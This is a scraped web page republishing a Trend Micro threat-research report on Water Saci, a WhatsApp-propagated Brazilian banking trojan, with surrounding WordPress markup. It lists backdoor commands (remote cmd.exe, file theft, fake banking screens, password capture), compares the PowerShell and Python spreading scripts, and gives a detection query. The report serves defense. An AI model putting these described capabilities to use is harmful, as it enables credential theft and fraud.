valign=\"top\">&lt;|AtivarImagem|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Start screen capturing<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|DesativarImagem|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Stop screen capturing<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|AlterarResolucao|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Modify screen resolution<\/td>\n<\/tr>\n<tr>\n<td width=\"147\" rowspan=\"3\" valign=\"top\">Communication Features<\/td>\n<td width=\"213\" valign=\"top\">&lt;|OpenChat|&gt;<\/td>\n<td width=\"263\" rowspan=\"3\" valign=\"top\">Chat Functionality<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|Chat|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|CloseChat|&gt;<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"147\" rowspan=\"19\" valign=\"top\">Mouse Control Commands<\/td>\n<td width=\"213\" valign=\"top\">&lt;|MousePos|&gt;<\/td>\n<td width=\"263\" rowspan=\"13\" valign=\"top\">Mouse movement and clicking simulation \u2022&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; LD\/LU: Left mouse button down\/up \u2022&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RD\/RU: Right mouse button down\/up \u2022&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; MD\/MU: Middle mouse button down\/up<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseLD|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseLD_Volta|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseLU|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseLU_Volta|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseRD|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseRD_Volta|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseRU|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseRU_Volta|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseMD|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" 
valign=\"top\">&lt;|MouseMD_Volta|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseMU|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseMU_Volta|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseWheelUp|&gt;<\/td>\n<td width=\"263\" rowspan=\"4\" valign=\"top\">Mouse wheel scrolling<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseWheelUp_Volta|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseWheelDown|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MouseWheelDown_Volta|&gt;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|MOUSESENDINPUT|&gt;<\/td>\n<td width=\"263\" rowspan=\"2\" valign=\"top\">Toggle mouse input method<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MOUSESENDNORMAL|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"147\" valign=\"top\">&nbsp;<\/td>\n<td width=\"213\" valign=\"top\">&lt;|LULUZSD|&gt;<\/td>\n<td width=\"263\" valign=\"top\">&nbsp;<\/td>\n<\/tr>\n<tr>\n<td width=\"147\" rowspan=\"4\" valign=\"top\">File System Operations<\/td>\n<td width=\"213\" valign=\"top\">&lt;|Folder|&gt;<\/td>\n<td width=\"263\" valign=\"top\">List directories<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|Files|&gt;<\/td>\n<td width=\"263\" valign=\"top\">List files in directory<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|DownloadFile|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Download file from victim to C&amp;C<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|UploadFile|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Upload file from C&amp;C to victim<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"3\" valign=\"top\">System Control<\/td>\n<td width=\"213\" valign=\"top\">&lt;|RESTART|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Force restart the machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" 
valign=\"top\">&lt;|CMD|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Execute remote command using cmd.exe<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MONKEY|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Random input simulation<\/td>\n<\/tr>\n<tr>\n<td width=\"147\" rowspan=\"3\" valign=\"top\">Windows Management<\/td>\n<td width=\"213\" valign=\"top\">&lt;|LIST_WINDOWS|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Enumerate all windows<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|LISTMIN_WINDOWS|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Minimize windows<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|LISTKILL_WINDOWS|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Kill specific windows<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"6\" valign=\"top\">Monitoring and Evasion<\/td>\n<td width=\"213\" valign=\"top\">&lt;|MOVISIBLE|&gt;<\/td>\n<td width=\"263\" rowspan=\"2\" valign=\"top\">Control mouse cursor visibility<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MOINVISIBLE|&gt;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|BLOQUEARMOUSE|&gt;<\/td>\n<td width=\"263\" rowspan=\"2\" valign=\"top\">Block\/restore mouse functionality<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|RESTAURARMOUSE|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;zzz|DELETEDKL|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Delete keylogger data<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|MENSAGEM|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Display custom message<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"147\" rowspan=\"3\" valign=\"top\">System Information<\/td>\n<td width=\"213\" valign=\"top\">&lt;|GETINFO|&gt; \/ &lt;|LIST_INFO|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Gather system information<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|Metodo|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Set operational 
method\/mode<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|Reconected|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Handle reconnection<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"4\" valign=\"top\">Print System Control<\/td>\n<td width=\"213\" valign=\"top\">&lt;|GETPRINTHANLE|&gt;<\/td>\n<td width=\"263\" rowspan=\"4\" valign=\"top\">Screen capture for different contexts<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|GETPRINTMAGNIFIER|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|GETPRINTDESKTOP|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|GETPRINTAPP|&gt;<\/td>\n<\/tr>\n<tr readability=\"7\">\n<td width=\"147\" rowspan=\"8\" valign=\"top\">Banking\/Financial Malware Features<\/td>\n<td width=\"213\" valign=\"top\">&lt;|CE_ASSI|&gt;<\/td>\n<td width=\"263\" rowspan=\"4\" valign=\"top\">Creates fake banking interfaces, Captures credentials and transaction data, specifically targets Brazilian banking systems<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|CE_TRANS|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|CB_SEN|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|CB_UPDATE|&gt;<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|PedidoSenhas|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Request passwords<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|SendSenha|&gt;<\/td>\n<td width=\"263\" valign=\"top\">Send passwords<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\">&lt;|HOLE|&gt;<\/td>\n<td width=\"263\" rowspan=\"2\" valign=\"top\">Screen overlay management<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\">&lt;|HOLENOFF|&gt;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 5. 
Backdoor commands granting the operator near-complete remote control over an infected system<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.309021113244\">\n<div readability=\"16.673704414587\">\n<p><b>Propagation automation &#8211; whatsz.py<\/b><\/p>\n<p>Our analysis revealed that tadeu.ps1, discussed in our previous <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/j\/active-water-saci-campaign-whatsapp-update.html\" target=\"_blank\">blog entry<\/a>, and whatsz.py (Figure 22) are functionally equivalent versions of the WhatsApp automation malware. The Python sample appears to be an enhanced port of the PowerShell version, maintaining the same workflow, logic, and intent. The extensive use of Python in this stage enables the attackers to automate propagation, streamline payload delivery, and enhance the flexibility and resilience of their malicious operations.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci22.png\" alt=\"Figure 22. Component files downloaded by instalar.bat and used by whatsz.py\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 22. Component files downloaded by instalar.bat and used by whatsz.py<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>When <i>instalar.bat<\/i> was executed, it downloaded component files including Python 3.12.7, get-pip.py, and the chromedriver.exe needed by the Python script to function properly and carry out its propagation routine (Figure 23). Both the PowerShell (tadeu.ps1) and Python (whatsz.py) scripts perform essentially the same tasks. 
They automate WhatsApp via Selenium, inject the WA\u2011JS library, grab contact lists, send files automatically (using Base64 encoding), load remote configurations, pause and resume tasks, and report progress back to a C&amp;C server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci23.png\" alt=\"Figure 23. Execution of instalar.bat leading to the Python script routine as seen in Vision One\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 23. Execution of instalar.bat leading to the Python script routine as seen in Vision One<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div class=\"responsive-table-wrap\" readability=\"9\">\n<p>Table 6 compares the previous PowerShell-based propagation routine with the newly observed Python variant, highlighting their shared automation features and enhancements in the latest campaign.<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td width=\"311\"><b>Feature<\/b><\/td>\n<td width=\"120\"><b>PowerShell (tadeu.ps1)<\/b><\/td>\n<td width=\"112\"><b>Python (whatsz.py)<\/b><\/td>\n<td><b>Match?<\/b><\/td>\n<\/tr>\n<\/tbody>\n<tbody readability=\"4\">\n<tr readability=\"2\">\n<td width=\"311\">WhatsApp automation via Selenium<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">WA-JS library injection<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">Mass contact extraction<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">Automated file sending<\/td>\n<td width=\"120\">\u2713<\/td>\n<td 
width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">Base64 file encoding<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"311\">Remote configuration loading<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">Pause\/resume system<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"311\">Progress reporting to C&amp;C<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"311\">Contact list exfiltration<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 6. Comparison of features between the PowerShell-based propagation routine and the Python variant<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.5\">\n<div readability=\"18\">\n<p>Given the similarity of logic, the injected JavaScript, and the explicit description included in the Python code itself, <i>\u201cWhatsApp Automation Script \u2013 Versao Python Convertido de PowerShell para Python Suporte para Chrome, Edge e Firefox\u201d<\/i> (Figure 24), there is compelling circumstantial evidence that an automated aid, such as a large language model (LLM) or code-translation tool, may have been used to accelerate the porting process. LLMs have proven capabilities for translating and refactoring code across languages and are commonly used for tasks like legacy migration and cross-language translation. 
While this observation doesn\u2019t definitively prove that an LLM was involved, it strongly supports the plausibility that one could have sped up the conversion.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci24.png\" alt=\"Figure 24. Python script header explicitly stating it was converted from PowerShell\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 24. Python script header explicitly stating it was converted from PowerShell<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Figures 25 and 26 display additional sections of the script that suggest the use of an LLM to expedite the conversion process. The snippets provided further illustrate potential interactions with AI, where requests for enhancements are made.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci25.png\" alt=\"Figure 25. The text: \u201dsend message to a contact \u2013 version optimized with errors handling\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 25. The text: \u201dsend message to a contact \u2013 version optimized with errors handling\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci26.png\" alt=\"Figure 26. The text: \u201d Send message to multiple contacts at same time \u2013 super fast!\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 26. 
The text: \u201d Send message to multiple contacts at same time \u2013 super fast!\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Notably, the script includes optimized messaging functions and a main automation class with comprehensive formatting for different statuses (Figure 27).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci27.png\" alt=\"Figure 27. Main automation class with formatting definitions for different statuses\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 27. Main automation class with formatting definitions for different statuses<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The script produces highly interesting and colorful output, including the use of emojis in console outputs, while running in the background (Figure 28). This is atypical for manually written automation scripts and may indicate AI-generated code designed for enhanced user experience.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci28.png\" alt=\"Figure 28. Example of colorful and emoji-enhanced console output, suggesting possible AI-generated script features.\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 28. 
Example of colorful and emoji-enhanced console output, suggesting possible AI-generated script features.<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>Despite the logic similarity, improvements were made that materially increase the Python variant\u2019s reach, reliability, and operational flexibility; this suggests that the port isn\u2019t just a straight translation but an upgrade. The Python build shifts to a more portable runtime, separates concerns into clearer classes, adds richer error handling and batch-sending capabilities, and broadens browser support (Table 7). Together, these changes make propagation faster, more resilient to failure, and easier to maintain or extend.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\"> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><b>Aspect<\/b><\/td>\n<td><b>PowerShell<\/b><\/td>\n<td><b>Python<\/b><\/td>\n<td><b>Significance<\/b><\/td>\n<\/tr>\n<\/tbody>\n<tbody readability=\"3\">\n<tr>\n<td><b>Language<\/b><\/td>\n<td>PowerShell<\/td>\n<td>Python 3<\/td>\n<td>Port\/translation<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><b>Browser support<\/b><\/td>\n<td>Chrome only<\/td>\n<td>Chrome\/Edge\/Firefox<\/td>\n<td>Enhanced capability and wider reach<\/td>\n<\/tr>\n<tr>\n<td><b>Code organization<\/b><\/td>\n<td>Functions<\/td>\n<td>Object-oriented (class)<\/td>\n<td>Better structure<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><b>Error handling<\/b><\/td>\n<td>Basic try-catch<\/td>\n<td>Enhanced with specific handlers<\/td>\n<td>More robust<\/td>\n<\/tr>\n<tr>\n<td><b>Batch sending<\/b><\/td>\n<td>Individual only<\/td>\n<td>Individual + batch mode<\/td>\n<td>Faster spreading<\/td>\n<\/tr>\n<tr>\n<td><b>Headless mode<\/b><\/td>\n<td>Supported<\/td>\n<td>Supported (enhanced)<\/td>\n<td>Stealth operation<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><b>Contact 
filtering<\/b><\/td>\n<td>Basic<\/td>\n<td>Enhanced (@lid filtering)<\/td>\n<td>Better targeting<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 7. Improvements to the Python variant compared to the PowerShell variant<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"49\">\n<div readability=\"43\">\n<h2><span class=\"body-subhead-title\">Conclusion<\/span><\/h2>\n<p>The Water Saci campaign exemplifies a new era of cyber threats in Brazil, where attackers exploit the trust and reach of popular messaging platforms like WhatsApp to orchestrate large-scale, self-propagating malware campaigns. By weaponizing familiar communication channels and employing advanced social engineering, threat actors are able to swiftly compromise victims, bypass traditional defenses, and sustain persistent banking trojan infections. This campaign demonstrates how legitimate platforms can be transformed into powerful vectors for malware delivery and underscores the growing sophistication of cybercriminal operations in the region.<\/p>\n<p>The campaign\u2019s multi-stage infection chain \u2013 spanning malicious HTA files, MSI installers, and advanced Python-based automation \u2013 underscores the increasing complexity of today\u2019s threats. Notably, the integration of propagation automation via WhatsApp, anti-analysis measures, and robust persistence mechanisms enables attackers to maximize reach while evading detection and maintaining long-term access to compromised systems.<\/p>\n<p>This analysis highlights the urgent need for organizations and individuals to adopt a multi-layered security approach. 
Proactive measures such as disabling auto-downloads in messaging applications, restricting file transfers, enhancing user awareness, and deploying advanced endpoint security solutions are crucial in defending against sophisticated, script-based threats like Water Saci.<\/p>\n<p>As attackers continue to innovate, leveraging both technical and social vectors, it is imperative to combine robust technology with continuous education and vigilant security practices. Trend Micro remains committed to monitoring these evolving threats, providing actionable intelligence, and empowering organizations to stay ahead of the adversaries.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<h2><span class=\"body-subhead-title\">Defense recommendations\u202f<\/span><\/h2>\n<p>To minimize the risks associated with the Water Saci campaign, Trend recommends several practical initial defense items:\u202f&nbsp;<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Disable auto-downloads on WhatsApp.<span> Turn off automatic downloads of media and documents in WhatsApp settings to reduce accidental exposure to malicious files.\u202f&nbsp;<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Control file transfers on personal apps.<span> Use endpoint security or firewall policies to block or restrict file transfers through personal applications like WhatsApp, Telegram, or WeTransfer on company-managed devices. If your organization supports BYOD, enforce strict app whitelisting or containerization to protect sensitive environments.\u202f&nbsp;<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enhance user awareness. <span>The victimology of the Water Saci campaign suggests that attackers are targeting enterprises. Regular security training helps an organization\u2019s employees recognize the dangers of downloading files via messaging platforms. 
Advise users to avoid clicking on unexpected attachments or suspicious links, even when they come from known contacts, and promote the use of secure, approved channels for transferring business documents.\u202f&nbsp;<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enhance email and communication security controls. <span>Restrict access to personal email and messaging apps on corporate devices. Use web and email gateways with URL filtering to block known malicious C&amp;C and phishing domains.&nbsp;<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enforce multi-factor authentication (MFA) and session hygiene. <span>Require MFA for all cloud and web services to prevent session hijacking. Advise users to log out after using messaging apps and regularly clear browser cookies and tokens.&nbsp;<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Deploy advanced endpoint security solutions. <span>Use Trend\u2019s endpoint security platforms (such as Trend Micro Apex One\u2122 or Vision One) to detect and block suspicious script-based attacks, fileless malware, and automation abuse. 
Enable behavioral monitoring to catch unauthorized VBS\/PowerShell execution, browser profile alterations, and lateral movement attempts related to WhatsApp and similar threats.&nbsp;<\/span><\/span><\/li>\n<\/ul>\n<p>Implementing these recommendations will help organizations and individuals better defend against malware threats delivered through messaging applications.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.096097560976\">\n<div readability=\"19.962926829268\">\n<h2><span class=\"body-subhead-title\">Proactive security with Trend Vision One\u2122\u202f<\/span><\/h2>\n<p><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform.html\" target=\"_blank\">Trend Vision One<\/a>\u2122 is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management and security operations, delivering robust layered protection across on-premises, hybrid, and multi-cloud environments.&nbsp;<\/p>\n<p>The following sections contain Trend Vision One insights, reports, and queries mentioned in the previous blog with additional information from this report. 
&nbsp;<\/p>\n<h3><span class=\"body-subhead-title\">Trend Vision One Threat Intelligence\u202f<\/span><\/h3>\n<p>To stay ahead of evolving threats, Trend customers can access&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/threat-intelligence.html\" target=\"_blank\">Trend Vision One Threat Insights<\/a>&nbsp;which provides the latest insights from Trend\u2122 Research on emerging threats and threat actors.&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p><b>Trend Vision One Threat Insights\u202f\u202f<\/b><\/p>\n<p><b>Trend Vision One Intelligence Reports (IOC Sweeping)\u202f\u202f<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.19978858351\">\n<div readability=\"15.864693446089\">\n<h4>Hunting Queries\u202f\u202f<\/h4>\n<h5>Trend Vision One Search App\u202f\u202f<\/h5>\n<p>Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.\u202f<\/p>\n<p><i><b>Detect process creation events where a randomly named .exe executes a randomly named .log file.<\/b><\/i><\/p>\n<p><span class=\"blockquote\">eventSubId:2 AND processCmd:\/[A-Za-z0-9]{6,}\\.exe [A-Za-z0-9]{6,}\\.log\/<\/span><\/p>\n<h2><span class=\"body-subhead-title\">Indicators of Compromise (IoCs)<\/span><\/h2>\n<p>The indicators of compromise for this entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/IOCs_WaterSaci.txt\"><span class=\"bs-modal\">here<\/span><\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <\/body> Read More <a 
href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/water-saci.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,10938,9509],"class_list":["post-59779","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-artificial-intelligence-ai","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Unraveling Water Saci&#039;s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Unraveling Water Saci&#039;s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
